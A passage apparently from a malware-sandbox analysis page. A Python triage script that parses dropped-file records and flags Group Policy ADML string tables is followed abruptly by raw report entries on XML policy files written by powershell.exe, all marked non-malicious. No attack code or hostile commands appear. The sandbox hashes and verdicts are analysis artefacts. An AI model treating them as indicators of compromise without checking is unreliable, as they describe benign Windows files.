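    Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):1205
    Entropy (8bit):4.9534177597350935
    Encrypted:false
    SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yLwjaMb3zjS/RmN3FooRFV:cgeD5x8gm8fKkqaM3a/RmNqAFV
    MD5:F4ED8285AC3F6D33796ECEB5A7D654D7
    SHA1:8856483D9DE028B8ADED5807E7F786E61BA9A969
    SHA-256:94D9C7AAF148F31B6129B5567F963832427DE828DCD7E0B31F1BCBDBD5DBED3C
    SHA-512:6B7A56459CCC4DDE7A3EE144334295653B394D5D6499E98FC0184244D6FE4B3BE38324492378EA88C4851133678287CD4C5381120F83488AE639279CBFC8A328
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema"
"""

# Hex digest length expected for each hash field the report emits.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}
HEX = re.compile(r"^[0-9A-Fa-f]+$")
# Root element of a Group Policy ADML string table (assumed marker).
ADML_MARKER = "<policyDefinitionResources "


def parse_records(text):
    """Split Key:Value rows into one dict per dropped file.

    A new record starts at every "Process:" row; only the first colon of a
    row separates key from value, so Windows paths and ssdeep digests
    (which contain further colons) survive intact.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def hash_problems(rec):
    """Names of hash fields that are missing, wrong length or not hex."""
    bad = []
    for name, length in HASH_LEN.items():
        value = rec.get(name, "")
        if len(value) != length or not HEX.match(value):
            bad.append(name)
    return bad


def triage(rec):
    """Label one record: 'review' if the sandbox flagged it, 'adml-resource'
    for PowerShell-written XML that is a Group Policy string table,
    otherwise 'unknown' (the analyst looks at those next)."""
    if rec.get("Malicious", "").strip().lower() == "true":
        return "review"
    is_ps = rec.get("Process", "").lower().endswith("powershell.exe")
    is_xml = rec.get("File Type", "").startswith("XML")
    if is_ps and is_xml and ADML_MARKER in rec.get("Preview", ""):
        return "adml-resource"
    return "unknown"


def summarize(text):
    """Count triage labels over every record in the text."""
    return dict(Counter(triage(r) for r in parse_records(text)))


def worth_a_look(text):
    """Records that are not ADML noise, plus any with malformed hashes."""
    return [r for r in parse_records(text)
            if triage(r) != "adml-resource" or hash_problems(r)]


if __name__ == "__main__":
    print(summarize(SAMPLE))
    for rec in worth_a_look(SAMPLE):
        print(rec.get("SHA-256"), triage(rec), hash_problems(rec))
```

Run against the full report text the summary shows how many dropped files are ADML string tables versus anything else; hash fields that fail the length or alphabet check usually mean the copy of the report was truncated or mangled and should be re-fetched before any of its indicators are used.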
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                        Entropy (8bit):5.0468646750436905
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ylySwH3ZhAEonuYNuEZsFV:cgeD5x8gm8fKiSYdmFV
                                                                                                                                                                                                        MD5:A4208900FDE8B3665E5C81E299CA7BFF
                                                                                                                                                                                                        SHA1:D15B972870FC4A1FBFF2E709DBC6AB031E4A46E6
                                                                                                                                                                                                        SHA-256:156AC533DE885DE2086D1506713B46BFBCFDEB20FCD783B16C3CD4C143868549
                                                                                                                                                                                                        SHA-512:A40CFC29E6C50B0CE4D98A1F9FFF71DBB17C8A33C7018BD9C4BD80BC31257D279F75057C3EEE1AC47F5A40FC16493D188CEFFAC7B0F5C70D16E22B1A492AC97D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NAP_Category">Network Access Protection</string>.. <string id="NAP_XP_1x_QEC">Allow the Network Access Protection client to support the 802.1x Enforcement Client component</string>.. <string id="NAP_XP_1x_Help">This policy setting allows the Network Access Protection (NAP) client to support the Windows XP version of the 802.1x Enforcement Client component.....If you enable this policy setting, NAP allows the Windows XP version of the 802.1x Wireless Enforcement Client to participate. ....If you disa
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (417), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5609
                                                                                                                                                                                                        Entropy (8bit):4.807720215972321
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oD5pmB6SbbXVjG7/loPSNYOag8hW3QDFzdQFXukdFeYoZTe2FRA15VrpbWFo9FV:+jErVjGmighWmAd8KoPe
                                                                                                                                                                                                        MD5:C62CBB79E2AF2E3CC1FD69206D0C9716
                                                                                                                                                                                                        SHA1:3C18FFFC927A30CCD66B2D23D553BCA29642497D
                                                                                                                                                                                                        SHA-256:5E583582C0A4A933C3A0E4A4270E034DE6B8DD23B2676A1ECAD986DB71F28E7D
                                                                                                                                                                                                        SHA-512:B65C8F3EF4A1DBA11E8E915F8E31A874E83042923F98941CD8441066C103ABBB61A720BF24729CE17DEDC1916873BB86E7C5E1830D4AA96982EE0592E3830F2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Connectivity Status Indicator Group Policy Settings</displayName>.. <description>Network Connectivity Status Indicator Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="NCSI_Category">Network Connectivity Status Indicator</string>.. <string id="NCSI_CorpWebProbeUrl">Specify corporate Website probe URL</string>.. <string id="NCSI_CorpWebProbeUrl_Help">This policy setting enables you to specify the URL of the corporate website, against which an active probe is performed.</string>.. <string id="NCSI_CorpDnsProbeHost">Specify corporate DNS probe host name</string>.. <string id="NCSI_CorpDnsPro
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1008), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):46428
                                                                                                                                                                                                        Entropy (8bit):4.777664679838725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:MwjkYrp+MHlkfrwiTrotseXkz4l/hHui7n421:/wYrcMHlkfrwiTrot3Xk8l9uM40
                                                                                                                                                                                                        MD5:B6CB2AF44B11487F92D14A3E9B7B4F70
                                                                                                                                                                                                        SHA1:DCFC1F715BD49D62021568F76D8CD3BBB85D01CF
                                                                                                                                                                                                        SHA-256:14B401FBE6F5FD279430D383196F16AC0D93EE665D0225C7F2C4C3DD56D7B847
                                                                                                                                                                                                        SHA-512:7373B5EFF0A8574961C7373CEF567071852FB57663978ED9E1A8BB2E9B6E4AB1390260204B518D40621AEC4B5F14A18793BE7D4550ADABBA0BDA11FFA90EEA6A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Netlogon">Net Logon</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain">Use DNS name resolution with a single-label domain name instead of NetBIOS name resolution to locate the DC</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain_Help">This policy setting specifies whether the computers to which this setting is applied attempt DNS name resolution of a single-label domain names.....By default, the behavior specified in the AllowDnsSuffixSearch is used. If the AllowDnsSuffixSearch policy is d
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1486), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41991
                                                                                                                                                                                                        Entropy (8bit):4.576451646468249
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:0dx8EooEviP1PjM6PtCldxD9xI2FzOkRZWx+LmCYvecgy3W7dlDelurmYEg4g+z/:iFOI
                                                                                                                                                                                                        MD5:0F0684FA5CF664EAF158690457E68D92
                                                                                                                                                                                                        SHA1:DFA272AD045597933D1144F01921EABA0B6BC4A4
                                                                                                                                                                                                        SHA-256:E86F5AD0D0A55ED34D90A2EE7222564656C684FCA48F9CE2C0363266C7C10ECE
                                                                                                                                                                                                        SHA-512:ED1BEF62FA7CECD3E618F31D951259704A13910E4AD3276C396003AF543EE6C6FBC86E4573366D6103D997B1C2DE98E879AE08BAB5676BE2F12579CBEDDD7D10
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NC_AddRemoveComponents">Prohibit adding and removing components for a LAN or remote access connection</string>.. <string id="NC_AddRemoveComponents_Help">Determines whether administrators can add and remove network components for a LAN or remote access connection. This setting has no effect on nonadministrators.....If you enable this setting (and enable the "Enable Network Connections settings for Administrators" setting), the Install and Uninstall buttons for components of connections are disabled, and admini
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6746
                                                                                                                                                                                                        Entropy (8bit):4.9079819692940125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:V+D5pmzqJhUf3fJyoZ+EsiZoTCdhY5+J6M6xpBGbvH4J5w4V:qdU/hyoXZoSrJ6nxpkbvHKN
                                                                                                                                                                                                        MD5:39E7220D62B6A3DBB2C126FBB57233BA
                                                                                                                                                                                                        SHA1:FA2CA706CB425FF910215D0E0D84DC05FEC673B6
                                                                                                                                                                                                        SHA-256:D7FDCFBCAD3F6A8CAE618320A16E408B4EF7A2830EBE54AC141F8CD37C4B26D2
                                                                                                                                                                                                        SHA-512:843380F52E434137DE92DF229B2C5103223EB4A22C6A52FC679B63A943938BD38B5AA5167F4DDB6620E921CEA1315B1EA84E1847AD83C780419FC1470E93E9BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Isolation </displayName>.. <description>Configures Network Isolation Options for apps </description>.. <resources>.. <stringTable>.. .<string id="WF_Isolation">Network Isolation</string>........ Define server addresses that proxy to the Internet -->......<string id="WF_NetIsolation_Domain_Proxies">Internet proxy servers for apps</string> ...<string id="WF_NetIsolation_Domain_Proxies_Help"> This setting does not apply to desktop apps......A semicolon-separated list of Internet proxy server IP addresses. These addresses are categorized as Internet by Windows Network Isolation and are accessible to apps that have the Internet Client or Internet Client/Server capabilities....
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2267
                                                                                                                                                                                                        Entropy (8bit):4.838388154516794
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKQqmmBpOVxwxpBewWk7EQg+61kg+6xrjMWK/WV:LeD5pmEqmmp8xwLBzWkiz/zZjMWK/WV
                                                                                                                                                                                                        MD5:1AEA64EE82CCCF20BE4E7178E0D9C569
                                                                                                                                                                                                        SHA1:674AC6F5BD545EB75E05FED6CDD384C4440C2B29
                                                                                                                                                                                                        SHA-256:615E09EEC96E2E99550CA7014AD5E7249C031E1E19B2241032C1BE983622729D
                                                                                                                                                                                                        SHA-512:0FDE894C202D495A8A674E637B6E5B1BE25333C1D4BFECA1CA3503A19E43ECB847131FF32B81145822C87513C308C07B9CBB8A519A62999FA992CB28C3348210
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNetworkProjector">Turn off Connect to a Network Projector</string>.. <string id="DisableNetworkProjectorExplain">This policy setting disables the Connect to a Network Projector wizard so that users cannot connect to a network projector. ....If you enable this policy setting, users cannot use the Connect to a Network Projector Wizard to connect to a projector. ....If you disable or do not configure this policy setting, users can run the Connect to a Network Projector Wizard to connect to a projector.</st
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (634), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50909
                                                                                                                                                                                                        Entropy (8bit):4.7108422069629725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:c5kq1yeql7iURcwKILdZoJ7TCFRFzMOXIo:ZekZMOD
                                                                                                                                                                                                        MD5:845935D73456E658B4DD9CB27224CBF7
                                                                                                                                                                                                        SHA1:7336E494495EB05622F3791BC19E46499B3B60DE
                                                                                                                                                                                                        SHA-256:169924EB41BD644647F5F4710438C757F1C3BEF0196D4D09CBF9B52D05D17A47
                                                                                                                                                                                                        SHA-512:9F6BDF080314A23D1A82321CB3C8171130695E82205F32E895A7C1EEDAE59571E2C22E09171FA9377BC429A0E8118E44E151754ED2FF1A63B112494F54A9FF02
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_OfflineFiles">Offline Files</string>.. <string id="Lbl_Fail">Never go offline</string>.. <string id="Lbl_FullSync">Full</string>.. <string id="Lbl_QuickSync">Quick</string>.. <string id="Lbl_WorkOffline">Work offline</string>.. <string id="Pol_AlwaysPinSubFolders">Subfolders always available offline</string>.. <string id="Pol_AlwaysPinSubFolders_Help">Makes subfolders available offline whenever their parent folder is made available offline.....This setting automatically extends the
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (447), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
Size (bytes):15965
Entropy (8bit):4.663039279812552
Encrypted:false
SSDEEP:192:EVvPk2QsF4WSKheDnylZ+QsF4W+KheDnyxko4QsF4WnKheDnyGS8OzsO4WdmI:OLvhwTjhwK4khwQ8wr
MD5:4CE12CD17365AE6E6C922AE0C3D70110
SHA1:328E59731F170FD42BA614E5FD6AC09AAD91C8D5
SHA-256:D262B118B555E83840A9AC077963B0E50F589C09950F77EB5865D25776D1A78B
SHA-512:41B5A3AF2D00993E50B4DA53132DFF75F07B549405C88589FB96AA85E074C418CA35931FA1B674EF7129B3495FABE404EF4A74F4C20A48BDE6F3E7A7408583A6
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="P2P_Disabled">Turn off Microsoft Peer-to-Peer Networking Services</string>.. <string id="P2P_Disabled_Explain">This setting turns off Microsoft Peer-to-Peer Networking Services in its entirety, and will cause all dependent applications to stop working.....Peer-to-Peer protocols allow for applications in the areas of RTC, collaboration, content distribution and distributed processing.....If you enable this setting, peer-to-peer protocols will be turned off.....If you disable this setting or do not configure it,

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1084
Entropy (8bit):5.01040774159096
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDTRc42cN28Ml28Sv7T8MZFV:cgeD5x8gm8fKitDvNQlGVFV
MD5:2DD43AEA1D0F6713F020401FC72878BC
SHA1:4A8B428938DB72FC55F5EA72F95E9323BE1B4192
SHA-256:FC70BC44ADAEC32E39A503CEEC2F52B98C697D61BE6C120A96480445A968FE5A
SHA-512:CB4FC3B7FC46F1CBFEE1EDA2B6D51ECE2E8DBE983BB0D083109D999AC020634721FD3B42D917FEB9146A12F86D79389FAA6B95CA0832F58CC063B22D0C4B882B
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ParentalControls">Family Safety</string>.. <string id="ParentalControls_EnableOnDomain_help">This policy setting allows you to configure the Family Safety feature.....If you enable this policy setting, the Family Safety control panel is visible on a domain joined computer.....If you disable or do not configure this policy setting, the Family Safety control panel is not visible on a domain joined computer.</string>.. <string id="ParentalControls_EnableOnDomain">Make Family Safety control panel visible on a

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (754), with CRLF line terminators
Category:dropped
Size (bytes):24638
Entropy (8bit):4.564624284444478
Encrypted:false
SSDEEP:384:N1iKAegTK4PjZqKNomwtzxkBK8R02vXkh3RIaImzg6h3hquhT:N1itegT5PjsQHwtzxkBJR9yqmzh3N
MD5:B5D667D298E0EDCC6D2FB6F0C01B7223
SHA1:931DE60F0DBE31DC890905C6D7ACC05112F810A8
SHA-256:673CB9F3C9B5B753C41C6B44519A04C32A10ABD90533CEC88E4AD20A0E564D55
SHA-512:44C5535A92A8DE5364FCC39ED26171BBA4C25DDE495BFA9A9695A7F2E7F579AE08D972CAFF848ED9D5A6339307EA3CD2033838FF8AE006340D2CCB8A9F90ADB9
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>BranchCache</displayName>.. <description>BranchCache enables clients to securely retrieve content from within the branch office instead of having to retrieve it from the server hosting the content. Depending on the deployment mode, the content can be retrieved from other clients in the branch office or from a hosted cache server in the branch. A client can only retrieve content from within the branch if it is authorized by the server to do so. The use of BranchCache reduces costs on the wide area network (WAN) link that connects your branch offices to the data center or headquarters and increases download speeds for content that has already been downl

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1208
Entropy (8bit):5.027249517124002
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yx9WmOQzWmYKAQKvqmiHAQKvMFV:cgeD5x8gm8fKAQmOVmYHimTHkFV
MD5:7B4EC129E00834B2E499BEBCE8E75083
SHA1:D4BEA36D9A628D70055431E5A6967BAF87294A02
SHA-256:A00BB104395F6DC86AF2921893AF3BC129D7A2A2DDFA5CCA22FF6D055AF11E31
SHA-512:5A5E2389AB7A3C432FEEB8D68F1C144A1525934FC1FA8442E8C12CC11652FEDF101E73AD8D10197FDC0F6AF0DA2D887BEFE2BAD792BEF4E943DD9C71EBAEB2F6
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PenTraining">Tablet PC Pen Training</string>.. <string id="PenTrainingOff">Turn off Tablet PC Pen Training</string>.. <string id="PenTrainingOff_Help_LOCALMACHINE">Turns off Tablet PC Pen Training.....If you enable this policy setting, users cannot open Tablet PC Pen Training.....If you disable or do not configure this policy setting, users can open Tablet PC Pen Training.</string>.. <string id="PenTrainingOff_Help_USER">Turns off Tablet PC Pen Training.....If you enable this policy setting, users ca

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (577), with CRLF line terminators
Category:dropped
Size (bytes):8181
Entropy (8bit):4.68291957028103
Encrypted:false
SSDEEP:192:E65cdjVSpt6DejVSpOZq1jVSpWLqXjVSpsHz2TgS:bk4md
MD5:1242B4E18BC034195D7064E4CDEB8B92
SHA1:4BF81B86AC91ED3B51C97569728CD29858459D68
SHA-256:29F060D6A4CA93A94F33D46150AF949B5F2EB63214AF05C5700E552555F81C54
SHA-512:0A17703E8858409CB9AEBE827143EA77516576F473AC18873B3848F4A4D000F739E757655945CAB3DBE8E05B06496E07C2C8C7811CE5D7407153D9B167B8015E
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootScenarioCategory">Windows Boot Performance Diagnostics</string>.. <string id="BootScenarioExecutionPolicyExplain">Determines the execution level for Windows Boot Performance Diagnostics.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect Windows Boot Performance problems and attempt to determine their root causes. These root causes will be logged to the eve

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1205
Entropy (8bit):4.988086677223878
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yuh9J6k7LXp4qVacJPYidFV:cgeD5x8gm8fKVJ6kSuacFYidFV
MD5:EF84A579BC8272236E53AB9F5BEE92CB
SHA1:670EA5FF6A1559F695E15D3A2D17B2A100BA79B7
SHA-256:82C7F47D059ED97EF6AC7068E43E6933E84ACE56543FD8C945065A51C0644A63
SHA-512:92D8CC050A24AC9F2D059486A9EA5A8184FCC6798261F789E36F1A4694F379EC9EFA8CA69AF8D53502187B7D908850EB2233038BD22901D116195F32E0E8A937
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PerfTrackCategory">Windows Performance PerfTrack</string>.. <string id="PerfTrackScenarioExecutionPolicyExplain">This policy setting specifies whether to enable or disable tracking of responsiveness events.....If you enable this policy setting, responsiveness events are processed and aggregated. The aggregated data will be transmitted to Microsoft through SQM.....if you disable this policy setting, responsiveness events are not processed.....If you do not configure this policy setting, the DPS will enable Wind

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (389), with CRLF line terminators
Category:dropped
Size (bytes):29740
Entropy (8bit):4.822333468541642
Encrypted:false
SSDEEP:384:EkJF7YAK1c67c5h9xRoKYy5V8iisCaeZou2Ap6:EkJF7YA0a9xR5V8iPCgu2Ap6
MD5:C0E2A98755B3DA961DBBCFA1A621154B
SHA1:878508DB646C47D8A36C90305D919C52CD8DC11C
SHA-256:0F8B66F7B315426ABEC4B71912D2FF5F1F4A573AC391CD8E0A10738AF808F8A6
SHA-512:AD72CA9823E3581557BE15F198F6BB697CEF9CC372881FED501DB236D6B35834A220603F4AB36FBEE65D36DF3473862F0AD93F9443EF82204F28130F635910E8
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ACCriticalSleepTransitionsDisable">Turn on the ability for applications to prevent sleep transitions (plugged in)</string>.. <string id="ACHibernateTimeOut">Specify the system hibernate timeout (plugged in)</string>.. <string id="ACPowerButtonAction">Select the Power button action (plugged in)</string>.. <string id="ACPromptForPasswordOnResume">Require a password when a computer wakes (plugged in)</string>.. <string id="ACSleepButtonAction">Select the Sleep button action (plugged in)</string>..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):8601
Entropy (8bit):4.7004620993687665
Encrypted:false
SSDEEP:96:wB3f/vzRzuppcRzhl5tWSLh2xwqmHfc9Ka7yOUpJD4mUQfStlm8hOE9m7pqHXSp3:ozRzu0P+uIxrmpn8mgtlm8B9mgc3
MD5:6E1645BEEB36B67E2486DF156AD73713
SHA1:96BF04C94854CBA227B3E3518A5BF6EEEEFFCA64
SHA-256:1963DE8A3D77000A3DCF16B751132920F2F8ED0274905285C914469D1597F11D
SHA-512:5A6D2DAEE84146D94A7D93640C92B14792C759D1E778C25BA3CA3B892628B87848EC414EC6DB709F6912B3E38397C608A343D719AF8B26169022FADBCF35DB79
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Windows PowerShell</displayName>.. <description>This file contains the configuration options for Windows PowerShell</description>.. <resources>.. <stringTable>.. <string id="AllScripts">Allow all scripts</string>.. <string id="AllScriptsSigned">Allow only signed scripts</string>.. <string id="EnableScripts">Turn on Script Execution</string>.. <string id="EnableScripts_Explain">This policy setting lets you configure the script execution policy, controlling which scripts are allowed to run.....If you enable this policy setting, the scripts selected in the drop-down list are allowed to run.....The "Allow only signed scripts" policy setting allows scripts to execute only if they are signed

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5301
Entropy (8bit):4.592135641503131
